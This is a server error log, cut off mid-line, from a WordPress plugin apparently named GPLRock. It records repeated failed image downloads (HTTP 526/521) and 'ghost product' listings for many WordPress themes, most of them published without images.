https://meldwp.com/wp-content/uploads/tukio--event-landing-page-wordpress-theme-18168.webp [04-Apr-2026 07:55:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tukio-event-landing-page-wordpress-theme [04-Apr-2026 07:55:53 UTC] GPLRock: Image download failed for product marshmallow-photographer-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:55:55 UTC] GPLRock: Image download failed for product marshmallow-photographer-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:55:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/marshmallow---photographer-wordpress-theme-29086.webp for product marshmallow-photographer-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:55:57 UTC] GPLRock: Image download failed for product marshmallow-photographer-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:55:59 UTC] GPLRock: Image download failed for product marshmallow-photographer-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:56:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/marshmallow---photographer-wordpress-theme-29086.webp for product marshmallow-photographer-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:56:01 UTC] GPLRock WARNING: Image download failed for product marshmallow-photographer-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/marshmallow---photographer-wordpress-theme-29086.webp [04-Apr-2026 07:56:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: marshmallow-photographer-wordpress-theme [04-Apr-2026 07:56:02 UTC] GPLRock: Image download failed for product quick-rental-vehicles-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:56:04 UTC] GPLRock: Image download failed for product quick-rental-vehicles-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:56:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/quick-rental---vehicles-booking-wordpress-theme-13611.webp for product quick-rental-vehicles-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:56:07 UTC] GPLRock: Image download failed for product quick-rental-vehicles-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:56:09 UTC] GPLRock: Image download failed for product quick-rental-vehicles-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:56:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/quick-rental---vehicles-booking-wordpress-theme-13611.webp for product quick-rental-vehicles-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:56:11 UTC] GPLRock WARNING: Image download failed for product quick-rental-vehicles-booking-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/quick-rental---vehicles-booking-wordpress-theme-13611.webp [04-Apr-2026 07:56:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: quick-rental-vehicles-booking-wordpress-theme [04-Apr-2026 07:56:11 UTC] GPLRock: Image download failed for product kidsjoy-kindergarten-preschool-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:56:13 UTC] GPLRock: Image download failed for product kidsjoy-kindergarten-preschool-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:56:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kidsjoy---kindergarten--preschool-wordpress-theme-5816.webp for product kidsjoy-kindergarten-preschool-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:56:15 UTC] GPLRock: Image download failed for product kidsjoy-kindergarten-preschool-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:56:17 UTC] GPLRock: Image download failed for product kidsjoy-kindergarten-preschool-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:56:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kidsjoy---kindergarten--preschool-wordpress-theme-5816.webp for product kidsjoy-kindergarten-preschool-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:56:19 UTC] GPLRock WARNING: Image download failed for product kidsjoy-kindergarten-preschool-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/kidsjoy---kindergarten--preschool-wordpress-theme-5816.webp [04-Apr-2026 07:56:19 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kidsjoy-kindergarten-preschool-wordpress-theme [04-Apr-2026 07:56:20 UTC] GPLRock: Image download failed for product bandco-consulting-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:56:22 UTC] GPLRock: Image download failed for product bandco-consulting-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:56:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bandco---consulting-business-wordpress-theme-14166.webp for product bandco-consulting-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:56:24 UTC] GPLRock: Image download failed for product bandco-consulting-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:56:26 UTC] GPLRock: Image download failed for product bandco-consulting-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:56:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bandco---consulting-business-wordpress-theme-14166.webp for product bandco-consulting-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:56:28 UTC] GPLRock WARNING: Image download failed for product bandco-consulting-business-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/bandco---consulting-business-wordpress-theme-14166.webp [04-Apr-2026 07:56:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bandco-consulting-business-wordpress-theme [04-Apr-2026 07:56:28 UTC] GPLRock: Image download failed for product zenix-tech-startup-saas-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:56:30 UTC] GPLRock: Image download failed for product zenix-tech-startup-saas-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:56:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zenix---tech-startup--saas-elementor-wordpress-theme-15280.webp for product zenix-tech-startup-saas-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:56:33 UTC] GPLRock: Image download failed for product zenix-tech-startup-saas-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:56:35 UTC] GPLRock: Image download failed for product zenix-tech-startup-saas-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:56:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zenix---tech-startup--saas-elementor-wordpress-theme-15280.webp for product zenix-tech-startup-saas-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:56:37 UTC] GPLRock WARNING: Image download failed for product zenix-tech-startup-saas-elementor-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/zenix---tech-startup--saas-elementor-wordpress-theme-15280.webp [04-Apr-2026 07:56:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: zenix-tech-startup-saas-elementor-wordpress-theme [04-Apr-2026 07:56:37 UTC] GPLRock: Image downloaded successfully for product berich-consulting-corporate-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e7a3ee34.webp [04-Apr-2026 07:56:37 UTC] GPLRock: Using pre-downloaded image for product berich-consulting-corporate-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e7a3ee34.webp [04-Apr-2026 07:56:37 UTC] GPLRock: Ghost product published with image - Product ID: berich-consulting-corporate-wordpress-theme [04-Apr-2026 07:59:02 UTC] GPLRock: Image download failed for product gabriela-crafted-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:59:04 UTC] GPLRock: Image download failed for product gabriela-crafted-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:59:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gabriela---crafted-blog-wordpress-theme-9016.webp for product gabriela-crafted-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:59:06 UTC] GPLRock: Image download failed for product gabriela-crafted-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:59:09 UTC] GPLRock: Image download failed for product gabriela-crafted-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:59:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gabriela---crafted-blog-wordpress-theme-9016.webp for product gabriela-crafted-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:59:11 UTC] GPLRock WARNING: Image download failed for product gabriela-crafted-blog-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/gabriela---crafted-blog-wordpress-theme-9016.webp [04-Apr-2026 07:59:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gabriela-crafted-blog-wordpress-theme [04-Apr-2026 07:59:11 UTC] GPLRock: Image download failed for product tectxon-industry-factory-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:59:13 UTC] GPLRock: Image download failed for product tectxon-industry-factory-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:59:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tectxon---industry--factory-wordpress-theme-21795.webp for product tectxon-industry-factory-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:59:15 UTC] GPLRock: Image download failed for product tectxon-industry-factory-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:59:17 UTC] GPLRock: Image download failed for product tectxon-industry-factory-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:59:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tectxon---industry--factory-wordpress-theme-21795.webp for product tectxon-industry-factory-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:59:19 UTC] GPLRock WARNING: Image download failed for product tectxon-industry-factory-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/tectxon---industry--factory-wordpress-theme-21795.webp [04-Apr-2026 07:59:19 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tectxon-industry-factory-wordpress-theme [04-Apr-2026 07:59:20 UTC] GPLRock: Image download failed for product tonda-elegant-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:59:22 UTC] GPLRock: Image download failed for product tonda-elegant-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:59:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tonda---elegant-shop-wordpress-theme-33659.webp for product tonda-elegant-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:59:24 UTC] GPLRock: Image download failed for product tonda-elegant-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:59:26 UTC] GPLRock: Image download failed for product tonda-elegant-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:59:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tonda---elegant-shop-wordpress-theme-33659.webp for product tonda-elegant-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:59:28 UTC] GPLRock WARNING: Image download failed for product tonda-elegant-shop-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/tonda---elegant-shop-wordpress-theme-33659.webp [04-Apr-2026 07:59:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tonda-elegant-shop-wordpress-theme [04-Apr-2026 07:59:28 UTC] GPLRock: Image download failed for product artefact-elementor-tattoo-piercing-studio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:59:30 UTC] GPLRock: Image download failed for product artefact-elementor-tattoo-piercing-studio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:59:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/artefact---elementor-tattoo-piercing-studio-wordpress-theme-25101.webp for product artefact-elementor-tattoo-piercing-studio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:59:33 UTC] GPLRock: Image download failed for product artefact-elementor-tattoo-piercing-studio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:59:35 UTC] GPLRock: Image download failed for product artefact-elementor-tattoo-piercing-studio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:59:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/artefact---elementor-tattoo-piercing-studio-wordpress-theme-25101.webp for product artefact-elementor-tattoo-piercing-studio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:59:37 UTC] GPLRock WARNING: Image download failed for product artefact-elementor-tattoo-piercing-studio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/artefact---elementor-tattoo-piercing-studio-wordpress-theme-25101.webp [04-Apr-2026 07:59:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: artefact-elementor-tattoo-piercing-studio-wordpress-theme [04-Apr-2026 07:59:37 UTC] GPLRock: Image download failed for product quadrone-drone-uav-video-pilot-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:59:39 UTC] GPLRock: Image download failed for product quadrone-drone-uav-video-pilot-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:59:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/quadrone---drone-uav-video-pilot-wordpress-theme-14410.webp for product quadrone-drone-uav-video-pilot-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:59:41 UTC] GPLRock: Image download failed for product quadrone-drone-uav-video-pilot-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:59:43 UTC] GPLRock: Image download failed for product quadrone-drone-uav-video-pilot-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:59:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/quadrone---drone-uav-video-pilot-wordpress-theme-14410.webp for product quadrone-drone-uav-video-pilot-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:59:45 UTC] GPLRock WARNING: Image download failed for product quadrone-drone-uav-video-pilot-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/quadrone---drone-uav-video-pilot-wordpress-theme-14410.webp [04-Apr-2026 07:59:45 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: quadrone-drone-uav-video-pilot-wordpress-theme [04-Apr-2026 07:59:46 UTC] GPLRock: Image downloaded successfully for product yodden-broadband-internet-services-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4cbc1cdb.webp [04-Apr-2026 07:59:46 UTC] GPLRock: Using pre-downloaded image for product yodden-broadband-internet-services-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4cbc1cdb.webp [04-Apr-2026 07:59:46 UTC] GPLRock: Ghost product published with image - Product ID: yodden-broadband-internet-services-wordpress-theme [04-Apr-2026 07:59:46 UTC] GPLRock: Image download failed for product vineland-wine-vineyard-tour-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:59:48 UTC] GPLRock: Image download failed for product vineland-wine-vineyard-tour-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:59:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vineland---wine--vineyard-tour-booking-wordpress-theme-14786.webp for product vineland-wine-vineyard-tour-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:59:50 UTC] GPLRock: Image download failed for product vineland-wine-vineyard-tour-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:59:52 UTC] GPLRock: Image download failed for product vineland-wine-vineyard-tour-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:59:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vineland---wine--vineyard-tour-booking-wordpress-theme-14786.webp for product vineland-wine-vineyard-tour-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:59:54 UTC] GPLRock WARNING: Image download failed for product vineland-wine-vineyard-tour-booking-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/vineland---wine--vineyard-tour-booking-wordpress-theme-14786.webp [04-Apr-2026 07:59:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vineland-wine-vineyard-tour-booking-wordpress-theme [04-Apr-2026 07:59:54 UTC] GPLRock: Image downloaded successfully for product the-affair-creative-theme-for-personal-blogs-and-magazines (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b7660be3.webp [04-Apr-2026 07:59:54 UTC] GPLRock: Using pre-downloaded image for product the-affair-creative-theme-for-personal-blogs-and-magazines: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b7660be3.webp [04-Apr-2026 07:59:54 UTC] GPLRock: Ghost product published with image - Product ID: the-affair-creative-theme-for-personal-blogs-and-magazines [04-Apr-2026 07:59:54 UTC] GPLRock: Image download failed for product yummye-restaurant-wine-bar-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:59:57 UTC] GPLRock: Image download failed for product yummye-restaurant-wine-bar-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:59:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/yummye---restaurant--wine-bar-wordpress-theme-23969.webp for product yummye-restaurant-wine-bar-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:59:59 UTC] GPLRock: Image download failed for product yummye-restaurant-wine-bar-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:00:01 UTC] GPLRock: Image download failed for product yummye-restaurant-wine-bar-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:00:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/yummye---restaurant--wine-bar-wordpress-theme-23969.webp for product yummye-restaurant-wine-bar-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:00:03 UTC] GPLRock WARNING: Image download failed for product yummye-restaurant-wine-bar-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/yummye---restaurant--wine-bar-wordpress-theme-23969.webp [04-Apr-2026 08:00:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: yummye-restaurant-wine-bar-wordpress-theme [04-Apr-2026 08:00:03 UTC] GPLRock: Image download failed for product jawn-modern-wordpress-news-magazine-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:00:05 UTC] GPLRock: Image download failed for product jawn-modern-wordpress-news-magazine-theme (attempt 2/3). HTTP Code: 521, Error: . Retrying... [04-Apr-2026 08:00:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jawn---modern-wordpress-news--magazine-theme-21475.webp for product jawn-modern-wordpress-news-magazine-theme after 3 attempts. HTTP Code: 521, Error: [04-Apr-2026 08:00:07 UTC] GPLRock: Image download failed for product jawn-modern-wordpress-news-magazine-theme (attempt 1/3). HTTP Code: 521, Error: . Retrying... [04-Apr-2026 08:00:09 UTC] GPLRock: Image download failed for product jawn-modern-wordpress-news-magazine-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:00:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jawn---modern-wordpress-news--magazine-theme-21475.webp for product jawn-modern-wordpress-news-magazine-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:00:12 UTC] GPLRock WARNING: Image download failed for product jawn-modern-wordpress-news-magazine-theme. URL: https://meldwp.com/wp-content/uploads/jawn---modern-wordpress-news--magazine-theme-21475.webp [04-Apr-2026 08:00:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: jawn-modern-wordpress-news-magazine-theme [04-Apr-2026 08:00:43 UTC] GPLRock: Image download failed for product uking-responsive-wordpress-education-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:00:45 UTC] GPLRock: Image download failed for product uking-responsive-wordpress-education-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:00:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/uking---responsive-wordpress-education-theme-7424.webp for product uking-responsive-wordpress-education-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:00:47 UTC] GPLRock: Image download failed for product uking-responsive-wordpress-education-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:00:49 UTC] GPLRock: Image download failed for product uking-responsive-wordpress-education-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:00:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/uking---responsive-wordpress-education-theme-7424.webp for product uking-responsive-wordpress-education-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:00:51 UTC] GPLRock WARNING: Image download failed for product uking-responsive-wordpress-education-theme. URL: https://meldwp.com/wp-content/uploads/uking---responsive-wordpress-education-theme-7424.webp [04-Apr-2026 08:00:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: uking-responsive-wordpress-education-theme [04-Apr-2026 08:00:52 UTC] GPLRock: Image download failed for product creativa-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:00:54 UTC] GPLRock: Image download failed for product creativa-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:00:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/creativa---multi-purpose-wordpress-theme-2532.webp for product creativa-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:00:56 UTC] GPLRock: Image download failed for product creativa-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:00:58 UTC] GPLRock: Image download failed for product creativa-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:01:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/creativa---multi-purpose-wordpress-theme-2532.webp for product creativa-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:01:00 UTC] GPLRock WARNING: Image download failed for product creativa-multi-purpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/creativa---multi-purpose-wordpress-theme-2532.webp [04-Apr-2026 08:01:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: creativa-multi-purpose-wordpress-theme [04-Apr-2026 08:01:00 UTC] GPLRock: Image download failed for product newser-newspaper-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:01:02 UTC] GPLRock: Image download failed for product newser-newspaper-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:01:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/newser---newspaper--magazine-wordpress-theme-13577.webp for product newser-newspaper-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:01:05 UTC] GPLRock: Image download failed for product newser-newspaper-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:01:07 UTC] GPLRock: Image download failed for product newser-newspaper-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:01:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/newser---newspaper--magazine-wordpress-theme-13577.webp for product newser-newspaper-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:01:09 UTC] GPLRock WARNING: Image download failed for product newser-newspaper-magazine-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/newser---newspaper--magazine-wordpress-theme-13577.webp [04-Apr-2026 08:01:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: newser-newspaper-magazine-wordpress-theme [04-Apr-2026 08:01:09 UTC] GPLRock: Image download failed for product transpix-logistics-warehouse-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:01:11 UTC] GPLRock: Image download failed for product transpix-logistics-warehouse-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:01:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/transpix---logistics-warehouse-wordpress-theme-4640.webp for product transpix-logistics-warehouse-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:01:13 UTC] GPLRock: Image download failed for product transpix-logistics-warehouse-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:01:15 UTC] GPLRock: Image download failed for product transpix-logistics-warehouse-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:01:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/transpix---logistics-warehouse-wordpress-theme-4640.webp for product transpix-logistics-warehouse-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:01:17 UTC] GPLRock WARNING: Image download failed for product transpix-logistics-warehouse-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/transpix---logistics-warehouse-wordpress-theme-4640.webp [04-Apr-2026 08:01:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: transpix-logistics-warehouse-wordpress-theme [04-Apr-2026 08:01:17 UTC] GPLRock: Image download failed for product aquato-drinking-water-delivery-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:01:20 UTC] GPLRock: Image download failed for product aquato-drinking-water-delivery-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:01:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aquato--drinking-water-delivery-wordpress-theme-24147.webp for product aquato-drinking-water-delivery-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:01:22 UTC] GPLRock: Image download failed for product aquato-drinking-water-delivery-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:01:24 UTC] GPLRock: Image download failed for product aquato-drinking-water-delivery-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:01:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aquato--drinking-water-delivery-wordpress-theme-24147.webp for product aquato-drinking-water-delivery-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:01:26 UTC] GPLRock WARNING: Image download failed for product aquato-drinking-water-delivery-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/aquato--drinking-water-delivery-wordpress-theme-24147.webp [04-Apr-2026 08:01:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: aquato-drinking-water-delivery-wordpress-theme [04-Apr-2026 08:01:26 UTC] GPLRock: Image download failed for product classifieds-classified-ads-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:01:28 UTC] GPLRock: Image download failed for product classifieds-classified-ads-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:01:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/classifieds---classified-ads-wordpress-theme-10369.webp for product classifieds-classified-ads-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:01:30 UTC] GPLRock: Image download failed for product classifieds-classified-ads-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:01:33 UTC] GPLRock: Image download failed for product classifieds-classified-ads-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:01:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/classifieds---classified-ads-wordpress-theme-10369.webp for product classifieds-classified-ads-wordpress-theme after 3 